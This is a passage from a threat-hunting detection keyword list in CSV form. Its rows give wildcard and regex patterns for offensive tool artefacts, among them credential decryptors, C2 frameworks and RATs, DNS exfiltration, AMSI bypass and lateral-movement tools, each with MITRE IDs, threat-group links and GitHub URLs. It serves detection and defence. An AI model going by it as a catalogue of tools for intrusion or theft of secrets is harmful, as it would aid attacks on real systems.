T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58189" "*schwarzesonnerat@googlemail.com*",".{0,1000}schwarzesonnerat\@googlemail\.com.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#email","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","58190" 
"*SCNotification.exe.config.malicious*",".{0,1000}SCNotification\.exe\.config\.malicious.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","58191" "*SCOMDecrypt.csproj*",".{0,1000}SCOMDecrypt\.csproj.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","58192" "*SCOMDecrypt.exe*",".{0,1000}SCOMDecrypt\.exe.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","58193" "*SCOMDecrypt.ps1*",".{0,1000}SCOMDecrypt\.ps1.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","58194" "*scp * feeds.sh:/*",".{0,1000}scp\s.{0,1000}\sfeeds\.sh\:\/.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","58199" "*scp * 
prose.sh:/*",".{0,1000}scp\s.{0,1000}\sprose\.sh\:\/.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","N/A","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","58200" "*scp -P *system_info.txt*",".{0,1000}scp\s\-P\s.{0,1000}system_info\.txt.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","58202" "*screen -S dnskire -*",".{0,1000}screen\s\-S\sdnskire\s\-.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","58204" "*screen_spy.rb*",".{0,1000}screen_spy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58205" "*screengrab.exe*",".{0,1000}screengrab\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","58226" "*screenshot_inject *",".{0,1000}screenshot_inject\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","58227" "*screenspy.rb*",".{0,1000}screenspy\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58228" "*screetsec/Microsploit*",".{0,1000}screetsec\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","N/A","5","439","121","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z","58229" "*screetsec/Pateensy*",".{0,1000}screetsec\/Pateensy.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","58230" "*screetsec/Sudomy*",".{0,1000}screetsec\/Sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","58231" "*screetsec/Vegile*",".{0,1000}screetsec\/Vegile.{0,1000}","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. 
There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","58232" "*--script broadcast-dhcp-discover*",".{0,1000}\-\-script\sbroadcast\-dhcp\-discover.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","58233" "*script/xor-bin.py*",".{0,1000}script\/xor\-bin\.py.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","N/A","3","213","40","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z","58234" "*script_main(wraith, cmdline)*",".{0,1000}script_main\(wraith,\scmdline\).{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","58235" "*ScriptBlockSmuggling.ps1*",".{0,1000}ScriptBlockSmuggling\.ps1.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - 
T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","1","N/A","https://bc-security.org/scriptblock-smuggling/","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","58236" "*scripthost_uac_bypass*",".{0,1000}scripthost_uac_bypass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58237" "*scripts*Remote-WmiExecute.*",".{0,1000}scripts.{0,1000}Remote\-WmiExecute\..{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","58238" "*scripts*Search-EventForUser.ps1*",".{0,1000}scripts.{0,1000}Search\-EventForUser\.ps1.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","58239" "*scripts/ghauri.py*",".{0,1000}scripts\/ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","58240" "*scripts/zoneadm.sh*",".{0,1000}scripts\/zoneadm\.sh.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","58241" "*scripts\ghauri.py*",".{0,1000}scripts\\ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - 
TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","58242" "*ScriptSentry-main.zip*",".{0,1000}ScriptSentry\-main\.zip.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","58243" "*ScRunBase32.exe*",".{0,1000}ScRunBase32\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider 
- XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","58244" "*ScRunBase32.py*",".{0,1000}ScRunBase32\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","58245" 
"*ScRunBase64.exe*",".{0,1000}ScRunBase64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","58246" "*ScRunBase64.py*",".{0,1000}ScRunBase64\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/scrun","1","1","N/A","N/A","10","10","179","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z","58247" "*scshell*XblAuthManager*",".{0,1000}scshell.{0,1000}XblAuthManager.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 
- T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58248" "*SCShell.exe*",".{0,1000}SCShell\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58249" "*scshell.py*",".{0,1000}scshell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - 
FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","58250" "*scshellbof.c*",".{0,1000}scshellbof\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 